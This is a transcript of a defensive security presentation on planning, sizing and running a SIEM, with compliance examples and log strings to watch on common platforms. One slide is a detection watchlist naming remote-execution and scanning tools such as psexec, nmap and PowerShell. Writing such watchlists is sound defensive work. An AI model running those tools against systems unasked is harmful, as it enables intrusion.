Security Information and Event Management

SIEM implementation presents challenges like high costs and time commitment, but offers benefits in enhancing security processes and preventing cyber threats. A mature SIEM is crucial for a robust security operations center. Explore the necessity of SIEM tools for effective cybersecurity management.

• SIEM implementation
• Cybersecurity challenges
• Security operations center
• Information security

olejniczak_a Follow

Uploaded on Mar 12, 2025 | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

Presentation Transcript

1. Security Information and Event Management Craig Pennington Sr. Network Information Security Analyst Wabash Valley Power Association c_pennington@wvpa.com

2. Show of Hands.Which describes you. Have a SIEM in place Fully Implemented, and is the Cornerstone of your SOC Doing lots of good stuff for you and have even more in the works I can t possibly keep up with all the alarms and I wish that thing would just shut up Paid someone else to deal with it and tell me what to do (Hosted or On-Premise?) Nothing yet but plan to get one soon Not sure I need one, or too much to deal with right now Other? 2

3. To SIEM or not to SIEM Challenges Analysts say for every dollar you spend directly on the SIEM you will spend 3 more to manage it Requires a lot of planning and a complete understanding of your environment (network, server and workstation levels) Useful implementations require good security processes and take a long time initially and remains ongoing, forever Vendors over promise and under deliver Unrealistic expectations of a SIEM being the answer to all your problems Benefits Bad guys have the upper hand and there is too much information to handle with manual processes Verizon s Data Breach Investigation Report over the last several years says that 97 percent of attacks could have been prevented by using simple security controls including log management and analysis A mature SOC depends on a mature SIEM implementation 3 Most SIEMs have lots of capabilities and integrations to 3rd party feeds

4. My OpinionYES you must SIEM There is so much information needing analyzed, so many compliance requirements, and due care standards, that realistically it is impossible to faithfully perform it all without these tools. You are probably already performing most (Hopefully at least some) of these activities. Look for ways the SIEM can automate it so you can reclaim at least some of the time investment it takes to run the SIEM 4

5. Why do People Struggle with SIEMs? Not prepared for the commitment of money and time up front and the ongoing needs Don t understand their environment and their needs Vikas Bhatia, CEO of the New York-based cyber security consultancy Kalki Consulting, "Almost all vendors want to sell you a big bang approach. but the best way to deploy is a phased approach. It is essential to identify in advance what system log files will be required for monitoring and know what level of security each asset requires. Security is a process and not a one-and-done tactical operation Mike Spencer with Accuvant, "Many organizations do not know what their critical assets are and therefore do not know how to protect them," 5

6. Features Basic Features Event Consolidation and Normalization Log Retention Alerting\Correlation Dashboards Reporting Advanced Threat Feeds Compliance Situational Awareness User Analytics Reduce False Positives Packet Capture File Integrity Monitoring Geo Location Work flows Forensic Analysis 6 Ticketing Long Term Retention

7. Determine Your Use Cases Gather information on your possible uses: Compliance (control-centric use cases) Threat assessment results and threats lists (threat-centric use cases) Asset lists (asset-centric use cases) Generate a big list of candidate use cases from the information you collect Determine the relevance of the above threats, controls and assets to your specific needs Initially prioritize the use cases focused on importance AND doability then prioritize and select top use cases by value to you 7

8. Compliance Examples PCI 10.7: Retain audit trail history for at least one year, with a minimum of three months immediately available for analysis (for example, online, archived, or restorable from backup). NERC CIP 007-6 Table R4: 4.1 - Log events at the BES Cyber System level (per BES Cyber System capability) or at the Cyber Asset level (per Cyber Asset capability) for identification of, and after-the-fact investigations of, Cyber Security Incidents that includes, as a minimum, each of the following types of events: 4.1.1. Detected successful login attempts; 4.1.2. Detected failed access attempts and failed login attempts; 4.1.3. Detected malicious code. 4.2 - Generate alerts for security events that the Responsible Entity determines necessitates an alert, that includes, as a minimum, each of the following types of events (per Cyber Asset or BES Cyber System capability): 4.2.1. Detected malicious code from Part 4.1; and 4.2.2. Detected failure of Part 4.1 event logging. 4.3 - Where technically feasible, retain applicable event logs identified in Part 4.1 for at least the last 90 consecutive calendar days except under CIP Exceptional Circumstances. 8

9. Choosing a Deployment Model Outsourced Benefits Less training is required Higher level of expertise available Can be more of an operating rather than a capital expenditure Staff turnover is less of a concern 24/7 analysis Concerns Your data leaves the premises Reliance on the Internet in order to manage the network Alarms still need investigated Limited visibility to data for custom or additional analysis Less opportunity to tune out false alarms (vendor decides what is important) 9 Inability to move between vendors and maintain the older logs

10. Choosing a Deployment Model (cont.) On-Premise Benefits Control over the your data and system functions Maximum ability to configure the correlation rules, reporting, retention periods, and other settings to meet your needs Easier to create custom feeds and input custom IOCs (such as IPs, URLs, etc. from sources like E-ISAC alerts) Concerns Tend to suffer from low staffing rates Staff being pulled off SIEM work to work on projects or other duties (hard to do part-time) Requires specialized training Often oversized versus actual needs 10

11. Sizing the SIEM Avoid playing feature bingo Compare the list of use cases features to the features from each product Look for the ability to deploy an evaluation or a proof of concept in your environment Licensed by endpoint or message volume? If hosted, are there additional costs for volume of storage to satisfy your retention requirements? If you only need basic features like log correlation and reporting don t pay for advanced enterprise features Do you require redundancy? How does the system scale? Do I have to throw away existing hardware investment if I need to scale up? 11

12. Questions To Ask SIEM Vendors What log sources does it handles out of the box? How to create custom maps? What Out of the box reports for security and compliance are included? What is the cost of maintenance? What is the cost of the SIEM product? How is it licensed? What is the cost of training? How is post-sale technical support handled? Stats? (time to first contact, ticket priorities, average time to resolution) Require hardware? Support virtualization? Support hybrid? Will it integrate with your current ticketing system? How much report/dashboard/alert customization options are available? 12

13. Questions To Ask SIEM Vendors (cont.) How will it help with operational roles and not just security? Is there a packet capture or flow option? How does the product handle older data that has been archived off-box? How thorough is the product documentation? What does the product do in the event of a license violation? How much staffing will I need for a deployment of this size? 13

14. Your SIEM Uses Versus Whats Built-in 14

15. The Path to SIEM Success Collect logs from standard security sources (Firewalls, IPS, Domain Controllers, Anti-virus/Anti-malware, Netflow, Web Proxy, etc.) Enrich logs with supplemental data (Vulnerabilities, Software versions, etc.) Global Threat Intelligence Feeds Correlate - finding the proverbial needles in the log haystacks Investigate - follow up and fix data source and normalization issues Document - Standard Operating Procedures, Service Level Agreements, Forensics/Investigation Procedures Incorporate Expanded log collection (more servers, workstations), additional uses such as application monitoring and analysis Continuously Improve Your Processes 15

16. Gartner Magic Quadrant 16

17. A SIEM can help with CIS Critical Security Controls CSC 1: Inventory of Authorized and Unauthorized Devices CSC 5: Controlled Use of Administrative Privileges CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs CSC 9: Limitation and Control of Network Ports, Protocols, and Services CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches CSC 14: Controlled Access Based on the Need to Know CSC 16: Account Monitoring and Control CSC 18: Application Software Security CSC 19: Incident Response and Management 17

18. What to Look for on Linux Successful user login: Accepted password , Accepted publickey , "session opened Failed user login: authentication failure , failed password User log-off: session closed User account change or deletion: delete user password changed , new user , Sudo actions: sudo: COMMAND= , FAILED su Service failure: failed or failure 18

19. Top Windows 10 Event IDs to Monitor and Alarm on (according to MalwareArchaeology.com) 4688 - New Process Look for the obvious malicious executables like cscript.exe, sysprep.exe, nmap.exe, nbtstat.exe, netstat.exe, ssh.exe, psexec.exe, psexecsvc.exe, ipconfig.exe, ping.exe, powershell.exe or new odd .exe s 4624 - Some account logged in. What is normal? 5140 - A share was accessed. They most likely connected to the C$ share 5156 Windows Firewall Network connection by process. Can see the process connecting to an IP that you can use GEOIP to resolve Country, Region and City. 7040 - A new service has changed. Static systems don't change details of services 7045 - A new service is installed. Static systems don't get new services except at patch time and new installs. 4663 - File auditing must be enabled on directories you want to monitor 4657 Registry auditing will give more Registry details than 4663 for Reg items 501 PowerShell execution 4104 PowerShell Scriptblockmodule loading 19

20. What to Look for on Cisco ASA Traffic allowed on firewall: Built connection , access-list permitted Traffic blocked on firewall: access-list denied , deny inbound ; Deny by Bytes transferred (large files?): Teardown TCP connection duration bytes Bandwidth and protocol usage: limit exceeded , CPU utilization Detected attack activity: attack from User account changes: user added , user deleted , User priv level changed Administrator access : AAA user , User locked out , login failed 20

21. What to Look for on Web Servers Excessive access attempts to non-existent files Code (SQL, HTML) seen as part of the URL Access to extensions you have not implemented Web service stopped/started/failed messages Access to risky pages that accept user input Look at logs on all servers in the load balancer pool Error code 200 on files that are not yours Failed user authentication: Error code 401, 403 Invalid request: Error code 400 Internal server error: Error code 500 21

22. A Few Informational Sites NRECA Managed Cybersecurity Services Provider List - http://newsletters.email.nreca.org/c/19p1ImXIAyFpetrhuOiTycmVZ Ultimatewindowssecurity.com Windows Security Log Quick Reference Guide - https://www.ultimatewindowssecurity.com/securitylog/quickref/downloads/quickref.zip Windows Security Log Events Encyclopedia - http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx Windows event ID lookup - www.eventid.net Petri.com Monitoring Windows Event Logs for Security Breaches - https://www.petri.com/monitoring- windows-event-logs-for-security-breaches SANS reading room - https://www.sans.org/reading-room/whitepapers/forensics/windows- logon-forensics-34132 Information Assurance Directorate - iad.gov (lots of secure config advice in Library) Spotting the Adversary with Windows Event Log Monitoring - https://www.iad.gov/iad/library/ia-guidance/security-configuration/applications/spotting- the-adversary-with-windows-event-log-monitoring.cfm Assess the Mess - https://www.iad.gov/iad/library/ia-guidance/security- configuration/industrial-control-systems/assess-the-mess.cfm 22

23. A Few Informational Sites (cont.) IASE Information Assurance Support Environment - iase.disa.mil Security Technical Implementation Guides (STIGs) - https://iase.disa.mil/stigs/Pages/index.aspx MalwareArchaeology.com Windows Logging Cheat Sheets - https://www.malwarearchaeology.com/cheat-sheets Preso from 2015 Splunk Conference - Finding Advanced Attacks and Malware With Only 6 Windows EventID s- https://conf.splunk.com/session/2015/conf2015_MGough_MalwareArchaelogy_SecurityC ompliance_FindingAdvnacedAttacksAnd.pdf Australian Government Department of Defense Australian Signals Directorate - https://www.asd.gov.au/ Critical Log Review Checklist for Security Incidents - https://zeltser.com/security- incident-log-review-checklist/ Identity and Access in Windows Server 2016 Appendix L: Events to Monitor - https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix- l--events-to-monitor Log analysis references - www.loganalysis.org 23

24. Q&A 24